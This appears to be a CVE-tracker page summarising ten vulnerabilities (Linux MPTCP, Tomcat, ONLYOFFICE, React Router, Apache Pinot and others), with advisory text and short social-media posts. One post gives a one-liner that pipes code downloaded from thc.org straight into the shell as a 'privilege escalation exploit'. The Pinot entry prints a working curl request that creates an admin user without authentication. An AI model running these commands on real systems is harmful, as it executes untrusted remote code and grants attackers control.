24h | 7d | 30d

Overview

  • 1902756969
  • reggie

12 Jan 2025
Published
13 Jan 2025
Updated

CVSS v4.0
MEDIUM (6.9)
EPSS
0.08%

KEV

Description

A vulnerability classified as critical has been found in 1902756969 reggie 1.0. Affected is the function download of the file src/main/java/com/itheima/reggie/controller/CommonController.java. The manipulation of the argument name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Statistics

  • 1 Post
  • 61 Interactions

Fediverse

Profile picture

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)”

  • 23
  • 38
  • 21 hours ago

Overview

  • Linux
  • Linux

15 Jan 2025
Published
23 Jan 2025
Updated

CVSS
Pending
EPSS
0.02%

KEV

Description

In the Linux kernel, the following vulnerability has been resolved: mptcp: fix TCP options overflow. Syzbot reported the following splat: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f] CPU: 1 UID: 0 PID: 5836 Comm: sshd Not tainted 6.13.0-rc3-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/25/2024 RIP: 0010:_compound_head include/linux/page-flags.h:242 [inline] RIP: 0010:put_page+0x23/0x260 include/linux/mm.h:1552 Code: 90 90 90 90 90 90 90 55 41 57 41 56 53 49 89 fe 48 bd 00 00 00 00 00 fc ff df e8 f8 5e 12 f8 49 8d 5e 08 48 89 d8 48 c1 e8 03 <80> 3c 28 00 74 08 48 89 df e8 8f c7 78 f8 48 8b 1b 48 89 de 48 83 RSP: 0000:ffffc90003916c90 EFLAGS: 00010202 RAX: 0000000000000001 RBX: 0000000000000008 RCX: ffff888030458000 RDX: 0000000000000100 RSI: 0000000000000000 RDI: 0000000000000000 RBP: dffffc0000000000 R08: ffffffff898ca81d R09: 1ffff110054414ac R10: dffffc0000000000 R11: ffffed10054414ad R12: 0000000000000007 R13: ffff88802a20a542 R14: 0000000000000000 R15: 0000000000000000 FS: 00007f34f496e800(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f9d6ec9ec28 CR3: 000000004d260000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_page_unref include/linux/skbuff_ref.h:43 [inline] __skb_frag_unref include/linux/skbuff_ref.h:56 [inline] skb_release_data+0x483/0x8a0 net/core/skbuff.c:1119 skb_release_all net/core/skbuff.c:1190 [inline] __kfree_skb+0x55/0x70 net/core/skbuff.c:1204 tcp_clean_rtx_queue net/ipv4/tcp_input.c:3436 [inline] tcp_ack+0x2442/0x6bc0 net/ipv4/tcp_input.c:4032 tcp_rcv_state_process+0x8eb/0x44e0 net/ipv4/tcp_input.c:6805 tcp_v4_do_rcv+0x77d/0xc70 net/ipv4/tcp_ipv4.c:1939 tcp_v4_rcv+0x2dc0/0x37f0 net/ipv4/tcp_ipv4.c:2351 ip_protocol_deliver_rcu+0x22e/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x341/0x5f0 net/ipv4/ip_input.c:233 NF_HOOK+0x3a4/0x450 include/linux/netfilter.h:314 NF_HOOK+0x3a4/0x450 include/linux/netfilter.h:314 __netif_receive_skb_one_core net/core/dev.c:5672 [inline] __netif_receive_skb+0x2bf/0x650 net/core/dev.c:5785 process_backlog+0x662/0x15b0 net/core/dev.c:6117 __napi_poll+0xcb/0x490 net/core/dev.c:6883 napi_poll net/core/dev.c:6952 [inline] net_rx_action+0x89b/0x1240 net/core/dev.c:7074 handle_softirqs+0x2d4/0x9b0 kernel/softirq.c:561 __do_softirq kernel/softirq.c:595 [inline] invoke_softirq kernel/softirq.c:435 [inline] __irq_exit_rcu+0xf7/0x220 kernel/softirq.c:662 irq_exit_rcu+0x9/0x30 kernel/softirq.c:678 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline] sysvec_apic_timer_interrupt+0x57/0xc0 arch/x86/kernel/apic/apic.c:1049 asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:702 RIP: 0033:0x7f34f4519ad5 Code: 85 d2 74 0d 0f 10 02 48 8d 54 24 20 0f 11 44 24 20 64 8b 04 25 18 00 00 00 85 c0 75 27 41 b8 08 00 00 00 b8 0f 01 00 00 0f 05 <48> 3d 00 f0 ff ff 76 75 48 8b 15 24 73 0d 00 f7 d8 64 89 02 48 83 RSP: 002b:00007ffec5b32ce0 EFLAGS: 00000246 RAX: 0000000000000001 RBX: 00000000000668a0 RCX: 00007f34f4519ad5 RDX: 00007ffec5b32d00 RSI: 0000000000000004 RDI: 0000564f4bc6cae0 RBP: 0000564f4bc6b5a0 R08: 0000000000000008 R09: 0000000000000000 R10: 00007ffec5b32de8 R11: 0000000000000246 R12: 0000564f48ea8aa4 R13: 0000000000000001 R14: 0000564f48ea93e8 R15: 00007ffec5b32d68 </TASK> Eric noted a probable shinfo->nr_frags corruption, which indeed occurs. The root cause is a buggy MPTCP option len computation in some circumstances: the ADD_ADDR option should be mutually exclusive with DSS since the blamed commit. Still, mptcp_established_options_add_addr() tries to set the relevant info in mptcp_out_options, if ---truncated---

Statistics

  • 3 Posts
  • 3 Interactions

Fediverse

Profile picture
Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

https://seclists.org/oss-sec/2025/q2/0

"The analyze(sic!) of the patch (https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=cbb26f7d8451fe56ccac802c6db48d16240feebd) reveals that the root cause of the bug has been partially fixed."
  • 1
  • 0
  • 11 hours ago
Profile picture
This follow-up to CVE-2024-57882 by Solar Designer also worth reading:

https://seclists.org/oss-sec/2025/q2/3

"A reason CVE-2024-57882 may have stayed unpatched in a distro is it could have been wrongly believed to be a NULL pointer dereference only due to a specific crash reported by Syzbot."

"net.mptcp.enabled can be set from inside an unprivileged net namespace"
  • 0
  • 2
  • 9 hours ago
Profile picture

Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

seclists.org/oss-sec/2025/q2/0

  • 0
  • 0
  • 10 hours ago

Overview

  • Pending

15 Jan 2014
Published
06 Aug 2024
Updated

CVSS
Pending
EPSS
0.41%

KEV

Description

Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors.

Statistics

  • 1 Post
  • 14 Interactions

Fediverse

Overview

  • Pending

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.

Statistics

  • 1 Post
  • 13 Interactions

Fediverse

Profile picture

Researchers, you don't need to be this patient. Just publish that shit.

medium.com/@mihat2/onlyoffice-

Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.

  • October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
  • October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
  • November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach the ONLYOFFICE through another channel.
  • December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
  • February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
  • February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
  • April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
  • February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.

nvd.nist.gov/vuln/detail/CVE-2

  • 6
  • 7
  • 6 hours ago

Overview

  • remix-run
  • react-router

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS v3.0
HIGH (7.5)
EPSS
Pending

KEV

Description

React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.

Statistics

  • 1 Post
  • 7 Interactions

Fediverse

Profile picture

Simple and practical vulns like this are always nice to read about and learn from and replicate.

github.com/remix-run/react-rou

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.

nvd.nist.gov/vuln/detail/CVE-2

  • 3
  • 4
  • 9 hours ago

Overview

  • Apache Software Foundation
  • Apache Parquet Java
  • org.apache.parquet:parquet-avro

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS v4.0
CRITICAL (10.0)
EPSS
0.09%

KEV

Description

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code Users are recommended to upgrade to version 1.15.1, which fixes the issue.

Statistics

  • 1 Post
  • 5 Interactions

Fediverse

Profile picture

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳

sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code

Users are recommended to upgrade to version 1.15.1, which fixes the issue.

nvd.nist.gov/vuln/detail/CVE-2

  • 2
  • 3
  • 16 hours ago

Overview

  • Apache Software Foundation
  • Apache Tomcat

10 Mar 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
89.64%

Description

Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads - attacker knowledge of the names of security sensitive files being uploaded - the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - application was using Tomcat's file based session persistence with the default storage location - application included a library that may be leveraged in a deserialization attack Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.

Statistics

  • 1 Post
  • 3 Interactions

Fediverse

Profile picture

Looks like CISA is now satisfied and has added CVE-2025-24813 (Apache Tomcat Path Equivalence Vulnerability ) to the KEV Catalog.

  • 2
  • 1
  • 10 hours ago

Overview

  • Microsoft
  • Azure Health Bot

01 Apr 2025
Published
02 Apr 2025
Updated

CVSS v3.1
HIGH (8.3)
EPSS
0.08%

KEV

Description

An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.

Statistics

  • 1 Post
  • 4 Interactions

Fediverse

Profile picture

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.

msrc.microsoft.com/update-guid

sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.

nvd.nist.gov/vuln/detail/CVE-2

  • 1
  • 3
  • 15 hours ago

Overview

  • Kentico
  • Xperience

24 Mar 2025
Published
24 Mar 2025
Updated

CVSS v3.1
MEDIUM (6.5)
EPSS
0.03%

KEV

Description

The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

Profile picture

I know that many of us tend to scoff at XSS vulns, but it's good to be reminded how they can be successfully used in a chain for something more interesting.

labs.watchtowr.com/xss-to-rce-

  • 1
  • 1
  • 15 hours ago

Overview

  • Apache Software Foundation
  • Apache Pinot
  • org.apache.pinot.controller.api

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
0.03%

KEV

Description

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

Profile picture

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.

lists.apache.org/thread/ksf8qs

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

nvd.nist.gov/vuln/detail/CVE-2

  • 0
  • 2
  • 16 hours ago
Showing 1 to 10 of 34 CVEs